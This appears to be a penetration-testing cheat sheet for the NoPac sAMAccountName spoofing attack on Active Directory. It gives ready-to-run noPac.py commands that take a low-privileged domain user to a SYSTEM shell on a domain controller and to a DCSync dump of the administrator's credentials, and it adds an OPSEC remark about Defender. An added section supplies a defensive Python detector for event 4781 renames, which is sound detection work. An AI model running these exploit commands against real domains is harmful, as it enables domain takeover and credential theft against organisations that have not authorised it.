NoPac (SamAccountName Spoofing)

Tags: Local, Authenticated, Lateral Movement, Privilege Escalation, Domain Admin

Identify

sudo python3 scanner.py domain.local/user:'password' -dc-ip <DCIP> -use-ldap

Exploit

sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <DCIP> -dc-host DC01 -shell --impersonate administrator -use-ldap
get SYSTEM shell on DC
sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <DCIP> -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN/administrator
noPac to DCSync
OPSEC: the -shell option spawns a SYSTEM shell via smbexec; the shell may connect, but Defender will likely block further execution.
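From the defender's side, the sAMAccountName rename this technique depends on is recorded as Windows Security event 4781 ("The name of an account was changed") when account management auditing is enabled. The following is an added example, not part of this page or the noPac tool: it scans constructed 4781 records and flags computer accounts renamed to a name that drops the trailing '$' or collides with a domain controller's account name; the DC list is assumed and the field names follow the 4781 event XML schema.

```python
"""Flag sAMAccountName changes characteristic of NoPac-style spoofing.

Added example (not from the original page or the noPac project). Input is a
list of dicts modelled on Windows Security event 4781 XML fields.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed sample 4781 events (not real log data).
SAMPLE_4781 = [
    {"OldTargetUserName": "WKS01$", "NewTargetUserName": "WKS02$", "SubjectUserName": "svc_join"},
    {"OldTargetUserName": "ATTACKER-PC$", "NewTargetUserName": "DC01", "SubjectUserName": "lowpriv"},
    {"OldTargetUserName": "DC01", "NewTargetUserName": "ATTACKER-PC$", "SubjectUserName": "lowpriv"},
    {"OldTargetUserName": "jsmith", "NewTargetUserName": "john.smith", "SubjectUserName": "helpdesk"},
]

# Assumed set of domain controller computer accounts for the monitored domain.
DC_ACCOUNTS = {"DC01$", "DC02$"}


@dataclass
class Finding:
    old: str
    new: str
    actor: str
    reason: str


def analyse_rename(evt: dict, dc_accounts=DC_ACCOUNTS) -> Optional[Finding]:
    """Return a Finding if one 4781 event looks like a NoPac-style rename."""
    old, new, actor = evt["OldTargetUserName"], evt["NewTargetUserName"], evt["SubjectUserName"]
    dc_hosts = {a.rstrip("$").upper() for a in dc_accounts}
    # Computer accounts normally keep their trailing '$'; dropping it is the key signal.
    if old.endswith("$") and not new.endswith("$"):
        reason = "computer account renamed without trailing '$'"
        if new.upper() in dc_hosts:
            reason += " and collides with a DC account name"
        return Finding(old, new, actor, reason)
    # A DC-like name being renamed back into a computer account is the reverse of the same step.
    if not old.endswith("$") and new.endswith("$") and old.upper() in dc_hosts:
        return Finding(old, new, actor, "DC-named account renamed back to a computer account")
    return None


def detect_nopac_renames(events, dc_accounts=DC_ACCOUNTS) -> list:
    """Run analyse_rename over all events and keep the hits, in log order."""
    return [f for f in (analyse_rename(e, dc_accounts) for e in events) if f]
```

Pair the rename findings with the same account's subsequent Kerberos ticket requests (events 4768/4769) from the same source to separate an attack from a legitimate computer rename.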